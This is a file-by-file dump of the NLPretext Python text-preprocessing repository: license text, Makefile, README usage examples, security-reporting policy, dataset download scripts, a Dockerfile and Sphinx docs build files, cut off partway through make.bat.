      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.

      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).

      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.

      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."

      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.

   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.

   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.

   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:

      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and

      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and

      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and

      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.

      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.

   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.

   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.

   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.

   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.

   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.

   END OF TERMS AND CONDITIONS

   APPENDIX: How to apply the Apache License to your work.

      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. We also recommend that a
      file or class name and description of purpose be included on the
      same "printed page" as the copyright notice for easier
      identification within third-party archives.

   Copyright [yyyy] [name of copyright owner]

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
© 2021 GitHub, Inc.
Terms
Privacy
Security
Status
Docs
Contact GitHub
Pricing
API
Training
Blog
About


================================================
FILE: Makefile
================================================
SHELL := /usr/bin/env bash

IMAGE := nlpretext
VERSION := latest

NO_CHECK_FLAG =  || true

ifeq ($(STRICT), 1)
	POETRY_COMMAND_FLAG =
	PIP_COMMAND_FLAG =
	SAFETY_COMMAND_FLAG =
	BANDIT_COMMAND_FLAG =
	SECRETS_COMMAND_FLAG =
	BLACK_COMMAND_FLAG =
	DARGLINT_COMMAND_FLAG =
	ISORT_COMMAND_FLAG =
	MYPY_COMMAND_FLAG =
else
	POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
	PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
	SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
	BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
	SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
	BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
	DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
	ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
	MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(POETRY_STRICT), 1)
	POETRY_COMMAND_FLAG =
else ifeq ($(POETRY_STRICT), 0)
	POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(PIP_STRICT), 1)
	PIP_COMMAND_FLAG =
else ifeq ($(PIP_STRICT), 0)
	PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(SAFETY_STRICT), 1)
	SAFETY_COMMAND_FLAG =
else ifeq ($(SAFETY_STRICT), 0)
	SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(BANDIT_STRICT), 1)
	BANDIT_COMMAND_FLAG =
else ifeq ($(BANDIT_STRICT), 0)
	BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(SECRETS_STRICT), 1)
	SECRETS_COMMAND_FLAG =
else ifeq ($(SECRETS_STRICT), 0)
	SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(BLACK_STRICT), 1)
	BLACK_COMMAND_FLAG =
else ifeq ($(BLACK_STRICT), 0)
	BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(DARGLINT_STRICT), 1)
	DARGLINT_COMMAND_FLAG =
else ifeq ($(DARGLINT_STRICT), 0)
	DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(ISORT_STRICT), 1)
	ISORT_COMMAND_FLAG =
else ifeq ($(ISORT_STRICT), 0)
	ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

ifeq ($(MYPY_STRICT), 1)
	MYPY_COMMAND_FLAG =
else ifeq ($(MYPY_STRICT), 0)
	MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif

.PHONY: download-poetry
download-poetry:
	curl -sSL https://install.python-poetry.org | python3 -

.PHONY: install
install:
	poetry env use python3.10
	poetry lock -n
	poetry install -n
ifneq ($(NO_PRE_COMMIT), 1)
	poetry run pre-commit install -t pre-commit -t pre-push
endif

.PHONY: check-safety
check-safety:
	poetry check$(POETRY_COMMAND_FLAG) && \
	poetry run pip check$(PIP_COMMAND_FLAG) && \
	poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \
	poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)

.PHONY: gitleaks
gitleaks:
	commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \
	if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;

.PHONY: format-code
format-code:
	poetry run pre-commit run --all

.PHONY: test
test:
	poetry run pytest

.PHONY: lint
lint: check-safety format-code test

# Example: make docker VERSION=latest
# Example: make docker IMAGE=some_name VERSION=1.0.4
.PHONY: docker
docker:
	@echo Building docker $(IMAGE):$(VERSION) ...
	docker build \
		-t $(IMAGE):$(VERSION) . \
		-f ./docker/Dockerfile

# Example: make clean_docker VERSION=latest
# Example: make clean_docker IMAGE=some_name VERSION=1.0.4
.PHONY: clean_docker
clean_docker:
	@echo Removing docker $(IMAGE):$(VERSION) ...
	docker rmi -f $(IMAGE):$(VERSION)

.PHONY: clean_build
clean_build:
	rm -rf build/

.PHONY: clean
clean: clean_build clean_docker


================================================
FILE: README.md
================================================
# NLPretext

<p align="center">
    <img src="/references/logo_nlpretext.png" />
</p>

<div align="center">

[![CI status](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml/badge.svg?branch%3Amain&event%3Apush)](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)
[![CD status](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml/badge.svg?event%3Arelease)](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)
[![Python Version](https://img.shields.io/badge/Python-3.8-informational.svg)](#supported-python-versions)
[![Dependencies Status](https://img.shields.io/badge/dependabots-active-informational.svg)](https://github.com/artefactory/NLPretext}/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)

[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
[![Security: bandit](https://img.shields.io/badge/security-bandit-informational.svg)](https://github.com/PyCQA/bandit)
[![Pre-commit](https://img.shields.io/badge/pre--commit-enabled-informational?logo=pre-commit&logoColor=white)](https://github.com/artefactory/NLPretext}/blob/main/.pre-commit-config.yaml)
[![Semantic Versions](https://img.shields.io/badge/%F0%9F%9A%80-semantic%20versions-informational.svg)](https://github.com/artefactory/NLPretext/releases)
[![Documentation](https://img.shields.io/badge/doc-sphinx-informational.svg)](https://github.com/artefactory/NLPretext}/tree/main/docs)
[![License](https://img.shields.io/badge/License-Apache%20Software%20License%202.0-informational.svg)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)

All the goto functions you need to handle NLP use-cases, integrated in NLPretext

</div>

# TL;DR


> *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?*  :tired_face:

> *Need to efficiently extract email adresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:


**NLPretext got you covered!** :rocket:

NLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project.


:mag: Quickly explore below our preprocessing pipelines and individual functions referential.

* [Default preprocessing pipeline](#default_pipeline)
* [Custom preprocessing pipeline](#custom_pipeline)
* [Replacing phone numbers](#replace_phone_numbers)
* [Removing hashtags](#remove_hashtags)
* [Extracting emojis](#extract_emojis)
* [Data augmentation](#data_augmentation)


Cannot find what you were looking for? Feel free to open an [issue]((https://github.com/artefactory/nlpretext/issues) ).


# Installation

### Supported Python Versions

- Main version supported : `3.8`
- Other supported versions : `3.9`, `3.10`


We strongly advise you to do the remaining steps in a virtual environnement.

To install this library from PyPi, run the following command:

```bash
pip install nlpretext
```

or with `Poetry`

```bash
poetry add nlpretext
```


# Usage

## Default pipeline <a name="default_pipeline"></a>

Need to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered:

```python
from nlpretext import Preprocessor
text = "I just got the best dinner in my life @latourdargent !!! I  recommend 😀 #food #paris \n"
preprocessor = Preprocessor()
text = preprocessor.run(text)
print(text)
# "I just got the best dinner in my life!!! I recommend"
```

## Create your custom pipeline <a name="custom_pipeline"></a>

Another possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example:

```python
from nlpretext import Preprocessor
from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,
remove_stopwords, lower_text)
from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji
text = "I just got the best dinner in my life @latourdargent !!! I  recommend 😀 #food #paris \n"
preprocessor = Preprocessor()
preprocessor.pipe(lower_text)
preprocessor.pipe(remove_mentions)
preprocessor.pipe(remove_hashtag)
preprocessor.pipe(remove_emoji)
preprocessor.pipe(remove_eol_characters)
preprocessor.pipe(remove_stopwords, args={'lang': 'en'})
preprocessor.pipe(remove_punct)
preprocessor.pipe(normalize_whitespace)
text = preprocessor.run(text)
print(text)
# "dinner life recommend"
```

Take a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token.


## Load text data

Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. Hopefully, you can use NLPretext's TextLoader class to easily import text data.
while it is not mandatory our textLoader work best with dask, make sure to have the librairy installed if you want the best performances.

```python
from nlpretext.textloader import TextLoader
files_path = "local_folder/texts/text.txt"
text_loader = TextLoader(use_dask=True)
text_dataframe = text_loader.read_text(files_path)
print(text_dataframe.text.values.tolist())
# ["I just got the best dinner in my life!!!",  "I recommend", "It was awesome"]
```

File path can be provided as string, list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authentified on a project.

```python
text_loader = TextLoader(text_column="name_of_text_column_in_your_data")

local_file_path = "local_folder/texts/text.csv" # File from local folder
local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder

gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS
s3_file_path = "s3://my-bucket/texts/text.json" # File from S3
hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS
azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure

gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard

text_dataframe_1 = text_loader.read_text(local_file_path)
text_dataframe_2 = text_loader.read_text(local_corpus_path)
text_dataframe_3 = text_loader.read_text(gcs_file_path)
text_dataframe_4 = text_loader.read_text(s3_file_path)
text_dataframe_5 = text_loader.read_text(hdfs_file_path)
text_dataframe_6 = text_loader.read_text(azure_file_path)
text_dataframe_7 = text_loader.read_text(gcs_corpus_path)

```

You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.
```python
text_loader = TextLoader(text_column="text_col")
preprocessor = Preprocessor()

file_path = "local_folder/texts/text.csv" # File from local folder

raw_text_dataframe = text_loader.read_text(local_file_path)
preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)

print(raw_text_dataframe.text_col.values.tolist())
# ["These   texts are not preprocessed",  "This is bad ## "]

print(preprocessed_text_dataframe.text_col.values.tolist())
# ["These texts are not preprocessed",  "This is bad"]
```


## Individual Functions

### Replacing emails <a name="replace_emails"></a>

```python
from nlpretext.basic.preprocess import replace_emails
example = "I have forwarded this email to obama@whitehouse.gov"
example = replace_emails(example, replace_with="*EMAIL*")
print(example)
# "I have forwarded this email to *EMAIL*"
```

### Replacing phone numbers <a name="replace_phone_numbers"></a>

```python
from nlpretext.basic.preprocess import replace_phone_numbers
example = "My phone number is 0606060606"
example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*")
print(example)
# "My phone number is *PHONE*"
```

### Removing Hashtags <a name="remove_hashtags"></a>

```python
from nlpretext.social.preprocess import remove_hashtag
example = "This restaurant was amazing #food #foodie #foodstagram #dinner"
example = remove_hashtag(example)
print(example)
# "This restaurant was amazing"
```

### Extracting emojis <a name="extract_emojis"></a>

```python
from nlpretext.social.preprocess import extract_emojis
example = "I take care of my skin 😀"
example = extract_emojis(example)
print(example)
# [':grinning_face:']
```

## Data augmentation <a name="data_augmentation"></a>

The augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.

```python
from nlpretext.augmentation.text_augmentation import augment_text
example = "I want to buy a small black handbag please."
entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
example = augment_text(example, method=”wordnet_synonym”, entities=entities)
print(example)
# "I need to buy a small black pocketbook please."
```


# 📈 Releases

You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext}/releases) page.

We follow [Semantic Versions](https://semver.org/) specification.

We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels.

For Pull Requests, these labels are configured, by default:

|               **Label**               |  **Title in Releases**  |
| :-----------------------------------: | :---------------------: |
|       `enhancement`, `feature`        |       🚀 Features       |
| `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring  |
|       `build`, `ci`, `testing`        | 📦 Build System & CI/CD |
|              `breaking`               |   💥 Breaking Changes   |
|            `documentation`            |    📝 Documentation     |
|            `dependencies`             | ⬆️ Dependencies updates |


GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.## 🛡 License

[![License](https://img.shields.io/github/license/artefactory/NLPretext)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)

This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) for more details.## 📃 Citation

```
@misc{nlpretext,
  author = {artefactory},
  title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},
  year = {2021},
  publisher = {GitHub},
  journal = {GitHub repository},
  howpublished = {\url{https://github.com/artefactory/NLPretext}}}
}
```


# Project Organization
------------

    .
    ├── .github/workflows           <- Where the CI and CD lives
    ├── datasets/external           <- Bash scripts to download external datasets
    ├── docker                      <- All you need to build a Docker image from that package
    ├── docs                        <- Sphinx HTML documentation
    ├── nlpretext                   <- Main Package. This is where the code lives
    │   ├── preprocessor.py         <- Main preprocessing script
    │   ├── text_loader.py          <- Main loading script
    │   ├── augmentation            <- Text augmentation script
    │   ├── basic                   <- Basic text preprocessing
    │   ├── cli                     <- Command lines that can be used
    │   ├── social                  <- Social text preprocessing
    │   ├── token                   <- Token text preprocessing
    │   ├── textloader              <- File loading
    │   ├── _config                 <- Where the configuration and constants live
    │   └── _utils                  <- Where preprocessing utils scripts lives
    ├── references                  <- assets
    ├── tests                       <- Where the tests lives
    ├── .gitignore
    ├── .pre-commit-config.yaml     <- Pre-commit configuration
    ├── CODE_OF_CONDUCT.md          <- Code of conduct guidelines
    ├── CONTRIBUTING.md             <- Contribution guidelines
    ├── LICENSE
    ├── Makefile
    ├── pyproject.toml              <- Package build configuration
    ├── README.md                   <- The top-level README for developers using this project.
    └── SECURITY.md

# Credits

- [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:
    - `fix_bad_unicode`
    - `normalize_whitespace`
    - `unpack_english_contractions`
    - `replace_urls`
    - `replace_emails`
    - `replace_numbers`
    - `replace_currency_symbols`
    - `remove_punct`
    - `remove_accents`
    - `replace_phone_numbers` *(with some modifications of our own)*


================================================
FILE: SECURITY.md
================================================
# Security

## 🔐 Reporting Security Issues

> Do not open issues that might have security implications!
> It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.

Vulnerabilities can be reported by emailing core members:

- artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)

Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:

- Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)
- Full paths of source file(s) related to the manifestation of the issue
- The location of the affected source code (tag/branch/commit or direct URL)
- Any special configuration required to reproduce the issue
- Environment (e.g. Linux / Windows / macOS)
- Step-by-step instructions to reproduce the issue
- Proof-of-concept or exploit code (if possible)
- Impact of the issue, including how an attacker might exploit the issue

This information will help us triage your report more quickly.

## Preferred Languages

We prefer all communications to be in English.


================================================
FILE: datasets/external/get_language_dataset.sh
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#!/bin/bash
wget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1
mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..


================================================
FILE: datasets/external/get_stanfordtweets.sh
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#!/bin/bash
wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip trainingandtestdata.zip
mkdir -p  tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip


================================================
FILE: docker/Dockerfile
================================================
FROM python:3.10-slim-buster

ENV LANG=C.UTF-8 \
  LC_ALL=C.UTF-8

RUN apt-get update && \
  apt-get install -y --no-install-recommends \
  curl coreutils \
  && rm -rf /var/lib/apt/lists/*

  # Install Poetry
ENV POETRY_VERSION=1.5.1
RUN pip install --upgrade pip
RUN python3 -m pip install "poetry==$POETRY_VERSION"

WORKDIR /home/workspace

COPY pyproject.toml ./

RUN poetry config virtualenvs.create false \
  && poetry lock \
  && poetry install --no-root --no-dev --no-interaction

COPY . /home/docker_user/workspace/

ENTRYPOINT ["poetry", "run", "nlpretext"]


================================================
FILE: docker/README.md
================================================
# Docker for nlpretext

## Installation

To create Docker you need to run:

```bash
make docker
```

which is equivalent to:

```bash
make docker VERSION=latest
```

You could also provide name and version for the image itself.
Default name is `IMAGE := nlpretext`.
Default version is `VERSION := latest`.

```bash
make docker IMAGE=some_name VERSION=1.0.4
```

## Usage

```bash
docker run -it --rm \
   -v $(pwd):/workspace \
   nlpretext bash
```

## How to clean up

To uninstall docker image run `make clean_docker` with `VERSION`:

```bash
make clean_docker VERSION=1.0.4
```

like in installation, you can also choose the image name

```bash
make clean_docker IMAGE=some_name VERSION=latest
```

If you want to clean all, including `build` run `make clean`


================================================
FILE: docs/Makefile
================================================
# Minimal makefile for Sphinx documentation
#

# You can set these variables from the command line, and also
# from the environment for the first two.
SPHINXOPTS           ?=
SPHINXBUILD          ?= poetry run sphinx-build
SPHINXAPIBUILD       ?= poetry run sphinx-apidoc
SPHINXMULTIVERSION   ?= poetry run sphinx-multiversion
SOURCEDIR            = source
BUILDDIR             = build

# Put it first so that "make" without argument is like "make help".
.PHONY: help Makefile
help:
	@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)

multiversion:
	@$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html

apidoc:
	@$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates

# Catch-all target: route all unknown targets to Sphinx using the new
# "make mode" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).
%: Makefile
	@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)


================================================
FILE: docs/make.bat
================================================
@ECHO OFF

REM Command file for Sphinx documentation

if "%SPHINXBUILD%" == "" (
	set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
if NOT "%PAPER%" == "" (
	set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)

if "%1" == "" goto help

if "%1" == "help" (
	:help
	echo.Please use `make ^<target^>` where ^<target^> is one of
	echo.  html       to make standalone HTML files
	echo.  dirhtml    to make HTML files named index.html in directories
	echo.  singlehtml to make a single large HTML file
	echo.  pickle     to make pickle files
	echo.  json       to make JSON files
	echo.  htmlhelp   to make HTML files and a HTML help project
	echo.  qthelp     to make HTML files and a qthelp project
	echo.  devhelp    to make HTML files and a Devhelp project
	echo.  epub       to make an epub
	echo.  latex      to make LaTeX files, you can set PAPER=a4 or PAPER=letter
	echo.  text       to make text files
	echo.  man        to make manual pages
	echo.  changes    to make an overview over all changed/added/deprecated items
	echo.  linkcheck  to check all external links for integrity
	echo.  doctest    to run all doctests embedded in the documentation if enabled
	goto end
)

if "%1" == "clean" (
	for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
	del /q /s %BUILDDIR%\*
	goto end
)

if "%1" == "html" (
	%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
	echo.
	echo.Build finished. The HTML pages are in %BUILDDIR%/html.
	goto end
)

if "%1" == "dirhtml" (
	%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
	echo.
	echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
	goto end
)

if "%1" == "singlehtml" (
	%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
	echo.
	echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
	goto end
)

if "%1" == "pickle" (
	%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
	echo.
	echo.Build finished; now you can process the pickle files.
	goto end
)

if "%1" == "json" (
	%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
	echo.
	echo.Build finished; now you can process the JSON files.
	goto end
)

if "%1" == "htmlhelp" (
	%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
	echo.
	echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
	goto end
)

if "%1" == "qthelp" (
	%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
	echo.
	echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
	echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp
	echo.To view the help file:
	echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc
	goto end
)

if "%1" == "devhelp" (
	%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
	echo.
	echo.Build finished.
	goto end
)

if "%1" == "epub" (
	%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
	echo.
	echo.Build finished. The epub file is in %BUILDDIR%/epub.
	goto end
)

if "%1" == "latex" (
	%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
	echo.
